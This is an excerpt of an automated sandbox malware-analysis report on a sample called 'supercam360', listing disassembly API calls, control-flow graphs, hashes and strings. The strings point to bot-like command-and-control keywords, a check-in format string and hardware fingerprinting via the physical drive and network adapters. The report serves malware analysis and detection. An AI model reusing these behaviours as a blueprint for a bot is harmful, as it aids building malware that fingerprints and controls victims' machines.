                                                    • InternetOpenA.WININET(?), ref: 02D672B5
                                                    • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D672DD
                                                    • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D672F5
                                                    • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D6730D
                                                    • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D67336
                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D67358
                                                    • InternetCloseHandle.WININET(00000000), ref: 02D67378
                                                    • InternetCloseHandle.WININET(00000000), ref: 02D67383
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D673EE
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D673FF
                                                    • _malloc.LIBCMT ref: 02D67498
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D674AA
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D674B6
                                                    • _malloc.LIBCMT ref: 02D6758E
                                                    • _strtok.LIBCMT ref: 02D675BF
                                                    • _swscanf.LIBCMT ref: 02D675D6
                                                    • _strtok.LIBCMT ref: 02D675ED
                                                    • _free.LIBCMT ref: 02D675F9
                                                    • Sleep.KERNEL32(000007D0), ref: 02D676F1
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D67772
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D67784
                                                    • _sprintf.LIBCMT ref: 02D67822
                                                    • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D678E6
                                                    • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6791A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d61000_supercam360.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                    • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                    • API String ID: 1657546717-1839899575
                                                    • Opcode ID: 6bfde5f7862114af7d3358709785deb9086da547924b71f7116f4e631b88b6f0
                                                    • Instruction ID: 91593ce2f91e8c4017360b663667715841bd61d98e7e5eb7cce5d3cfd58e651e
                                                    • Opcode Fuzzy Hash: 6bfde5f7862114af7d3358709785deb9086da547924b71f7116f4e631b88b6f0
                                                    • Instruction Fuzzy Hash: A532DE31548381AFE724AB24DC48BBBBBE6EF85318F10081DF58997391EB759D04CB62

                                                    Control-flow Graph

                                                    APIs
                                                    • RtlInitializeCriticalSection.NTDLL(02D971E0), ref: 02D664BA
                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D664D1
                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D664DA
                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D664E9
                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D664EC
                                                    • GetTickCount.KERNEL32 ref: 02D664F8
                                                      • Part of subcall function 02D6605A: _malloc.LIBCMT ref: 02D66068
                                                    • GetVersionExA.KERNEL32(02D97038), ref: 02D66525
                                                    • _malloc.LIBCMT ref: 02D66551
                                                      • Part of subcall function 02D72FAC: __FF_MSGBANNER.LIBCMT ref: 02D72FC3
                                                      • Part of subcall function 02D72FAC: __NMSG_WRITE.LIBCMT ref: 02D72FCA
                                                      • Part of subcall function 02D72FAC: RtlAllocateHeap.NTDLL(009F0000,00000000,00000001), ref: 02D72FEF
                                                    • _malloc.LIBCMT ref: 02D66561
                                                    • _malloc.LIBCMT ref: 02D6656C
                                                    • _malloc.LIBCMT ref: 02D66577
                                                    • _malloc.LIBCMT ref: 02D66582
                                                    • _malloc.LIBCMT ref: 02D6658D
                                                    • _malloc.LIBCMT ref: 02D66598
                                                    • _malloc.LIBCMT ref: 02D665A7
                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D665BE
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D665C7
                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D665D6
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D665D9
                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D665E4
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D665E7
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D66621
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D6662E
                                                    • _malloc.LIBCMT ref: 02D66652
                                                    • _malloc.LIBCMT ref: 02D66660
                                                    • _malloc.LIBCMT ref: 02D66667
                                                    • _malloc.LIBCMT ref: 02D6668D
                                                    • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D666A0
                                                    • Sleep.KERNEL32 ref: 02D666AE
                                                    • _malloc.LIBCMT ref: 02D666BA
                                                    • _malloc.LIBCMT ref: 02D666C7
                                                    • Sleep.KERNEL32(0000EA60), ref: 02D66708
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D66713
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D66724
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d61000_supercam360.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                    • API String ID: 4273019447-2678694477
                                                    • Opcode ID: 74a3809961040868f45a1811fc5deac63cd53481a2c8e0c2c1dac28d8f2312ee
                                                    • Instruction ID: f180c297e036595f4c530524aaf9898aa31f9eff53f87bf33a1642d249f40e50
                                                    • Opcode Fuzzy Hash: 74a3809961040868f45a1811fc5deac63cd53481a2c8e0c2c1dac28d8f2312ee
                                                    • Instruction Fuzzy Hash: 247140B1D583409BE7106F75AC49B5BBBF9EF85710F200819F94597380E7B89C108BA6

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 275 401b4b-401b68 LoadLibraryA 276 401c21-401c25 275->276 277 401b6e-401b7f GetProcAddress 275->277 278 401b85-401b8e 277->278 279 401c18-401c1b FreeLibrary 277->279 280 401b95-401ba5 GetAdaptersInfo 278->280 279->276 281 401ba7-401bb0 280->281 282 401bdb-401be3 280->282 283 401bc1-401bd7 call 403120 call 4018cc 281->283 284 401bb2-401bb6 281->284 285 401be5-401beb call 403106 282->285 286 401bec-401bf0 282->286 283->282 284->282 287 401bb8-401bbf 284->287 285->286 290 401bf2-401bf6 286->290 291 401c15-401c17 286->291 287->283 287->284 290->291 294 401bf8-401bfb 290->294 291->279 296 401c06-401c13 call 4030f8 294->296 297 401bfd-401c03 294->297 296->280 296->291 297->296
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                    • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                    • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                    • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                    • API String ID: 514930453-3667123677
                                                    • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                    • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                    • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                    • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 363 2d6f9a6-2d6f9c9 LoadLibraryA 364 2d6f9cf-2d6f9dd GetProcAddress 363->364 365 2d6fa89-2d6fa90 363->365 366 2d6fa82-2d6fa83 FreeLibrary 364->366 367 2d6f9e3-2d6f9f3 364->367 366->365 368 2d6f9f5-2d6fa01 GetAdaptersInfo 367->368 369 2d6fa03 368->369 370 2d6fa39-2d6fa41 368->370 371 2d6fa05-2d6fa0c 369->371 372 2d6fa43-2d6fa49 call 2d737a8 370->372 373 2d6fa4a-2d6fa4f 370->373 377 2d6fa16-2d6fa1e 371->377 378 2d6fa0e-2d6fa12 371->378 372->373 375 2d6fa51-2d6fa54 373->375 376 2d6fa7d-2d6fa81 373->376 375->376 380 2d6fa56-2d6fa5b 375->380 376->366 382 2d6fa21-2d6fa26 377->382 378->371 381 2d6fa14 378->381 383 2d6fa5d-2d6fa65 380->383 384 2d6fa68-2d6fa73 call 2d73b4c 380->384 381->370 382->382 385 2d6fa28-2d6fa35 call 2d6f6f5 382->385 383->384 384->376 390 2d6fa75-2d6fa78 384->390 385->370 390->368
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D6F9BC
                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D6F9D5
                                                    • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D6F9FA
                                                    • FreeLibrary.KERNEL32(00000000), ref: 02D6FA83
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d61000_supercam360.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                    • String ID: GetAdaptersInfo$iphlpapi.dll
                                                    • API String ID: 514930453-3114217049
                                                    • Opcode ID: b23a0db134139d076409729f74f1aa5105e5cc953285b7c2b37eb22e975217e7
                                                    • Instruction ID: fe035490da5524fa0025028812805c9a948446efe77effc35345b03d6bb2ed0e
                                                    • Opcode Fuzzy Hash: b23a0db134139d076409729f74f1aa5105e5cc953285b7c2b37eb22e975217e7
                                                    • Instruction Fuzzy Hash: A321B675A08609AFDB10DFA8E888AFEBBF9EF09314F1440A9D446E7750D7318D45CBA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 391 2d6f8a2-2d6f8cd CreateFileA 392 2d6f8d3-2d6f8e8 391->392 393 2d6f99e-2d6f9a5 391->393 394 2d6f8eb-2d6f90d DeviceIoControl 392->394 395 2d6f946-2d6f94e 394->395 396 2d6f90f-2d6f917 394->396 397 2d6f957-2d6f959 395->397 398 2d6f950-2d6f956 call 2d737a8 395->398 399 2d6f920-2d6f925 396->399 400 2d6f919-2d6f91e 396->400 402 2d6f994-2d6f99d CloseHandle 397->402 403 2d6f95b-2d6f95e 397->403 398->397 399->395 404 2d6f927-2d6f92f 399->404 400->395 402->393 407 2d6f960-2d6f969 GetLastError 403->407 408 2d6f97a-2d6f987 call 2d73b4c 403->408 405 2d6f932-2d6f937 404->405 405->405 409 2d6f939-2d6f945 call 2d6f6f5 405->409 407->402 410 2d6f96b-2d6f96e 407->410 408->402 415 2d6f989-2d6f98f 408->415 409->395 410->408 413 2d6f970-2d6f977 410->413 413->408 415->394
                                                    APIs
                                                    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D6F8C1
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D6F8FF
                                                    • GetLastError.KERNEL32 ref: 02D6F960
                                                    • CloseHandle.KERNEL32(?), ref: 02D6F997
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d61000_supercam360.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                    • String ID: \\.\PhysicalDrive0
                                                    • API String ID: 4026078076-1180397377
                                                    • Opcode ID: 72cec230f65375f9edfbc197f818e1c929e96e885f3c9317105c46aa157e851a
                                                    • Instruction ID: beb6d948f0ba6df166e2c25becaeb0da20561266be3da6e6592132a344c3e6f9
                                                    • Opcode Fuzzy Hash: 72cec230f65375f9edfbc197f818e1c929e96e885f3c9317105c46aa157e851a
                                                    • Instruction Fuzzy Hash: 4A31AE71E00619BFDB24CF98E888BBEBBB9FB05714F24416AE516A3780D7705E00CB90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 417 401a4f-401a77 CreateFileA 418 401b45-401b4a 417->418 419 401a7d-401a91 417->419 420 401a98-401ac0 DeviceIoControl 419->420 421 401ac2-401aca 420->421 422 401af3-401afb 420->422 425 401ad4-401ad9 421->425 426 401acc-401ad2 421->426 423 401b04-401b07 422->423 424 401afd-401b03 call 403106 422->424 429 401b09-401b0c 423->429 430 401b3a-401b44 CloseHandle 423->430 424->423 425->422 427 401adb-401af1 call 403120 call 4018cc 425->427 426->422 427->422 433 401b27-401b34 call 4030f8 429->433 434 401b0e-401b17 GetLastError 429->434 430->418 433->420 433->430 434->430 437 401b19-401b1c 434->437 437->433 440 401b1e-401b24 437->440 440->433
                                                    APIs
                                                    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                    • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                    • GetLastError.KERNEL32 ref: 00401B0E
                                                    • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                    • String ID: \\.\PhysicalDrive0
                                                    • API String ID: 4026078076-1180397377
                                                    • Opcode ID: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                    • Instruction ID: ae54cd8959710a424601ffd4623f532e2396a469a493930b182490efebea7a61
                                                    • Opcode Fuzzy Hash: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                    • Instruction Fuzzy Hash: 50318D71D01118EECB21EF95CD809EFBBB8EF45750F20807AE514B22A0E7785E45CB98

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 301 401f64-401f84 FindResourceA 302 401f86-401f9d GetLastError SizeofResource 301->302 303 401f9f-401fa1 301->303 302->303 304 401fa6-401fec LoadResource LockResource GlobalAlloc call 402d60 * 2 302->304 305 402096-40209a 303->305 310 401fee-401ff9 304->310 310->310 311 401ffb-402003 GetTickCount 310->311 312 402032-402038 311->312 313 402005-402007 311->313 314 402053-402083 GlobalAlloc call 401c26 312->314 316 40203a-40204a 312->316 313->314 315 402009-40200f 313->315 323 402088-402093 314->323 315->314 317 402011-402023 315->317 318 40204c 316->318 319 40204e-402051 316->319 321 402025 317->321 322 402027-40202a 317->322 318->319 319->314 319->316 321->322 322->317 324 40202c-40202e 322->324 323->305 324->315 325 402030 324->325 325->314
                                                    APIs
                                                    • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                    • GetLastError.KERNEL32 ref: 00401F86
                                                    • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                    • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                    • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                    • GetTickCount.KERNEL32 ref: 00401FFB
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                    • String ID:
                                                    • API String ID: 564119183-0
                                                    • Opcode ID: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                    • Instruction ID: b01298f5e92dfabffd3260d40ec81ee59ee3d80feb476c4020a7475af27d6630
                                                    • Opcode Fuzzy Hash: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                    • Instruction Fuzzy Hash: 60315C32900255EFDB105FB89F8896F7B68EF45344B10807AFA86F7281DA748941C7A8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 326 2d67b86-2d67b8c 327 2d67b8e-2d67b9f 326->327 328 2d67b1c-2d67b2d 326->328 331 2d67ba4-2d67ba7 327->331 329 2d67b33-2d67b46 call 2d6439c 328->329 330 2d67b2e call 2d74af0 328->330 339 2d67b4f-2d67b56 call 2d72f74 329->339 340 2d67b48-2d67b4a call 2d6534d 329->340 330->329 333 2d67c04-2d67c09 331->333 334 2d67ba9-2d67bb9 331->334 335 2d67bcc-2d67bf4 333->335 336 2d67c0b-2d67c11 333->336 334->331 338 2d67bbb-2d67bc8 334->338 335->333 341 2d67b54-2d67b56 338->341 342 2d67bca 338->342 343 2d666f4-2d666f6 339->343 340->339 341->343 342->335 347 2d666ff-2d66701 343->347 348 2d666f8-2d666fd 343->348 350 2d66703 347->350 351 2d6670e-2d66742 RtlEnterCriticalSection RtlLeaveCriticalSection 347->351 349 2d66708 Sleep 348->349 349->351 350->349 352 2d66744-2d66750 351->352 353 2d66792 351->353 352->353 354 2d66752-2d6675f 352->354 355 2d66796 353->355 356 2d66767-2d66768 354->356 357 2d66761-2d66765 354->357 358 2d6676c-2d66790 call 2d74af0 * 2 356->358 357->358 358->355
                                                    APIs
                                                    • Sleep.KERNEL32(0000EA60), ref: 02D66708
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D66713
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D66724
                                                    • _free.LIBCMT ref: 02D67B50
                                                    Strings
                                                    • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D66739
                                                    • urls, xrefs: 02D67B36
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d61000_supercam360.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveSleep_free
                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                    • API String ID: 2653569029-4235545730
                                                    • Opcode ID: afd0ffa40f03660fea3e3019185a44c325a42b43e2b72d67fa2f6e57272c30c8
                                                    • Instruction ID: 38d7a257db1ebe5563d03313311671473f86e015394b055a74da93db82eff0fd
                                                    • Opcode Fuzzy Hash: afd0ffa40f03660fea3e3019185a44c325a42b43e2b72d67fa2f6e57272c30c8
                                                    • Instruction Fuzzy Hash: 2D419B7194C3919FE711EF28AC087AABBB2EF46314F140499E5C19B395D724DC02C796

                                                    Control-flow Graph

                                                    APIs
                                                    • GetVersion.KERNEL32 ref: 00403336
                                                      • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                      • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                    • GetCommandLineA.KERNEL32 ref: 00403384
                                                    • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                      • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                    • String ID:
                                                    • API String ID: 2057626494-0
                                                    • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                    • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                    • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                    • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 470 40264e-40266b GetProcAddress 471 4026e4-402700 call 2d73d0f 470->471 472 402d4b 470->472 474 40d22e-40d234 Sleep 471->474 473 40da37-40df1c 472->473 472->474 478 40df22 473->478 479 40291d-402924 473->479 477 40dd2d 474->477 481 40dd33-40dd37 477->481 482 40dd3d-40ddff 477->482 486 40df27 478->486 480 40297b-402987 479->480 484 40260b-402638 call 40209b 480->484 488 40d099-40d09c 480->488 481->482 481->484 482->480 487 40de05-40df5e GetLastError 482->487 484->471 486->486 488->477
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: AddressProcSleep
                                                    • String ID: B:%
                                                    • API String ID: 1175476452-921457382
                                                    • Opcode ID: 23616e709f3a8f92ee577e4f06470e49853b31bb415dd92b2dc5cf32625e53e4
                                                    • Instruction ID: 5de13a12f4540e4fd9c75831dffb799ae9cb131bfc725f57e4845645b6027e56
                                                    • Opcode Fuzzy Hash: 23616e709f3a8f92ee577e4f06470e49853b31bb415dd92b2dc5cf32625e53e4
                                                    • Instruction Fuzzy Hash: 0B110631A08201DFDB00CF68CA99BAA3BA0AF04354F14412BF956EB2D0C374DA46DB5A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 493 402556-402569 RegCreateKeyExA 494 40db60 493->494 495 402a64-402b0f SetEvent 493->495 494->495 496 40db66-40dcec 494->496 497 402b11 495->497 497->497
                                                    APIs
                                                    • RegCreateKeyExA.KERNEL32(80000002,Software\ATour), ref: 00402561
                                                    • SetEvent.KERNEL32 ref: 00402AE0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent
                                                    • String ID: Software\ATour
                                                    • API String ID: 2692171526-3083386596
                                                    • Opcode ID: f186dd0b7bc98dd43764a25f86a4cb0d0e809b4a92060d8c1256fdb064220542
                                                    • Instruction ID: 97827390f0dbf811a8766feaa4b3b3f1fe6a4e1045c6de9f8130f5e784142085
                                                    • Opcode Fuzzy Hash: f186dd0b7bc98dd43764a25f86a4cb0d0e809b4a92060d8c1256fdb064220542
                                                    • Instruction Fuzzy Hash: BD117635E052829BD3105B30FF61BE27BB9A746760F04027EC996B72A2C3788C46E65C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 499 402723-40d20f call 403120 503 40d215-40d21d 499->503 504 40d0f8-40d15d 499->504 506 40d80d 503->506 505 40d7b5-40d7bd OpenSCManagerA 504->505 507 40d927 505->507 508 40d813-40d814 506->508 509 40d0b7-40d0c4 506->509 511 40d92a 507->511 510 40d85b 509->510 510->507 511->511
                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: ManagerOpen
                                                    • String ID: \$sqlite3.dll
                                                    • API String ID: 1889721586-2821398869
                                                    • Opcode ID: 520e348fbed41caa7d91e0eeccad9f0cf03247776b24ec716f8ec42433566651
                                                    • Instruction ID: 02cac2386a51af119043485a38359376ff8e08f267ee505fb347487170b15741
                                                    • Opcode Fuzzy Hash: 520e348fbed41caa7d91e0eeccad9f0cf03247776b24ec716f8ec42433566651
                                                    • Instruction Fuzzy Hash: AE116F71C08656DADB085BF45EA65FA3FA09701320F2045BFC557B12E1C13C4A09D72E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 512 2d61aa9-2d61ac3 InterlockedIncrement 513 2d61ac5-2d61ad7 WSAStartup InterlockedExchange 512->513 514 2d61add-2d61ae0 512->514 513->514
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(02D972B4), ref: 02D61ABA
                                                    • WSAStartup.WS2_32(00000002,00000000), ref: 02D61ACB
                                                    • InterlockedExchange.KERNEL32(02D972B8,00000000), ref: 02D61AD7
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d61000_supercam360.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked$ExchangeIncrementStartup
                                                    • String ID:
                                                    • API String ID: 1856147945-0
                                                    • Opcode ID: 795bf03a0540a5e529a39357296ddccaf674ed6634291bb8ae7c1fb626a84f3f
                                                    • Instruction ID: ec2dab29a81155badd8ed13d64f2ef2929c3b5622fc4ee304eea9c3f60c7ba5c
                                                    • Opcode Fuzzy Hash: 795bf03a0540a5e529a39357296ddccaf674ed6634291bb8ae7c1fb626a84f3f
                                                    • Instruction Fuzzy Hash: DDD05E75DB42145FF62066A4AC4EB78F72CE706B11F300651FC7AC03C0EA515D28C5B6

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 515 402947-402959 516 40295b-402976 515->516 517 40298f-4029ad 515->517 519 40d6d1 RegCloseKey 516->519 517->519 520 40d6d7 519->520 520->520
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: Eshenc43
                                                    • API String ID: 3535843008-4181249012
                                                    • Opcode ID: 15ef28204f07d7b48703b89e2d6c5d33e29141c309989999f2207bc0bfe5d7bc
                                                    • Instruction ID: be004e59aa3699ca12022b62cae7feaba2be92beb7ca5540e0a9a012bdacf4b0
                                                    • Opcode Fuzzy Hash: 15ef28204f07d7b48703b89e2d6c5d33e29141c309989999f2207bc0bfe5d7bc
                                                    • Instruction Fuzzy Hash: 76F027325087425ADF120BB40A696D47BB1AB42300B24247FD4D2711E3C3BC4513E71E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
